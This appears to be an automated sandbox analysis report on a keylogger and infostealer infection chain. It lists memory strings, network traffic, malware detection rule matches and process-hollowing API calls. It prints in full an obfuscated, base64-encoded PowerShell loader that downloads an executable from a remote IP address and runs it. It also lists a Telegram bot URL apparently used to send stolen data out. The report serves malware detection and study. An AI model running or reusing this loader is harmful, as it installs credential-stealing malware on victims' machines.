                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000003.00000002.1522620204.000000000845F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: vcc.exe, 00000006.00000003.1461293441.000000007F366000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1465421810.0000000000746000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1502701800.0000000020F50000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020599000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461563985.000000007F256000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461563985.000000007F210000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020570000.00000004.00001000.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000000.1463840013.0000000000416000.00000002.00000001.01000000.0000000A.sdmp, daphpvwO.pif.6.drString found in binary or memory: http://www.pmail.com
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.00000000293F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000003.00000002.1511309376.000000000757C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/UEV/icrosoft.Uev.Commands.dll
                  Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.00000000293E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49712 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: 11.2.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.vcc.exe.210b6e48.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.1.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.1.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.1.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.vcc.exe.212605a8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000B.00000001.1464557928.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000B.00000002.3809626790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\vcc.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exeJump to dropped file
                  Source: C:\Users\user\Links\daphpvwO.pifProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0289421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_0289421C
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02893380 NtWriteVirtualMemory,6_2_02893380
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02893034 NtAllocateVirtualMemory,6_2_02893034
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02899654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,6_2_02899654
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02899738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,6_2_02899738
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028995CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,6_2_028995CC
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02893B44 NtUnmapViewOfSection,6_2_02893B44
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028938D4 NtReadVirtualMemory,6_2_028938D4
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0289421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_0289421A
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02893032 NtAllocateVirtualMemory,6_2_02893032
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02899578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,6_2_02899578
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0289A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,6_2_0289A634
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028820B46_2_028820B4
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00408C6011_2_00408C60
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0040DC1111_2_0040DC11
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00407C3F11_2_00407C3F
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00418CCC11_2_00418CCC
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00406CA011_2_00406CA0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004028B011_2_004028B0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0041A4BE11_2_0041A4BE
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0041824411_2_00418244
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0040165011_2_00401650
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00402F2011_2_00402F20
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004193C411_2_004193C4
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0041878811_2_00418788
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00402F8911_2_00402F89
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00402B9011_2_00402B90
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004073A011_2_004073A0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_28F9144811_2_28F91448
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_28F9143811_2_28F91438
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_28F911A811_2_28F911A8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_28F9119811_2_28F91198
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C033F0811_2_2C033F08
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03B7E011_2_2C03B7E0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03B11011_2_2C03B110
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C036BF011_2_2C036BF0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03EDA111_2_2C03EDA1
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03EDB011_2_2C03EDB0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03F64F11_2_2C03F64F
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03F66011_2_2C03F660
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C033EF811_2_2C033EF8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C031F2911_2_2C031F29
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03A75911_2_2C03A759
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03A76811_2_2C03A768
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03B10611_2_2C03B106
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03E94811_2_2C03E948
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03E95811_2_2C03E958
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03F1FA11_2_2C03F1FA
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03F20811_2_2C03F208
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03FAA811_2_2C03FAA8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03FAB811_2_2C03FAB8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C036BE011_2_2C036BE0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB54E011_2_2CBB54E0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBBD8011_2_2CBBBD80
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB06A011_2_2CBB06A0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB304811_2_2CBB3048
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB004011_2_2CBB0040
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB62BA11_2_2CBB62BA
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBB4D011_2_2CBBB4D0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBB4C111_2_2CBBB4C1
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBAC2011_2_2CBBAC20
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBAC1011_2_2CBBAC10
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBD47011_2_2CBBD470
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBD46111_2_2CBBD461
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB8DB811_2_2CBB8DB8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB8DA811_2_2CBB8DA8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB059211_2_2CBB0592
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBE5D011_2_2CBBE5D0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBE5C111_2_2CBBE5C1
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBDD2011_2_2CBBDD20
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBDD1111_2_2CBBDD11
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBBD7011_2_2CBBBD70
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBEE8011_2_2CBBEE80
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB1EE811_2_2CBB1EE8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB1ED811_2_2CBB1ED8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB163811_2_2CBB1638
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB162711_2_2CBB1627
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBEE7011_2_2CBBEE70
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB966811_2_2CBB9668
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB965A11_2_2CBB965A
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBA7B911_2_2CBBA7B9
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB279811_2_2CBB2798
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB278811_2_2CBB2788
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB87D811_2_2CBB87D8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBA7C811_2_2CBBA7C8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB9F1811_2_2CBB9F18
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB9F0911_2_2CBB9F09
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBC76811_2_2CBBC768
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBC75711_2_2CBBC757
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBD8BA11_2_2CBBD8BA
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBD8C811_2_2CBBD8C8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBD01811_2_2CBBD018
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBD00911_2_2CBBD009
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB000611_2_2CBB0006
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBB07811_2_2CBBB078
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBB06811_2_2CBBB068
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBC1D811_2_2CBBC1D8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBC1C811_2_2CBBC1C8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBB92811_2_2CBBB928
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBB91811_2_2CBBB918
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBE17811_2_2CBBE178
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBE16811_2_2CBBE168
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB896011_2_2CBB8960
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB9AB011_2_2CBB9AB0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB1A9011_2_2CBB1A90
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB1A8011_2_2CBB1A80
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB9AC011_2_2CBB9AC0
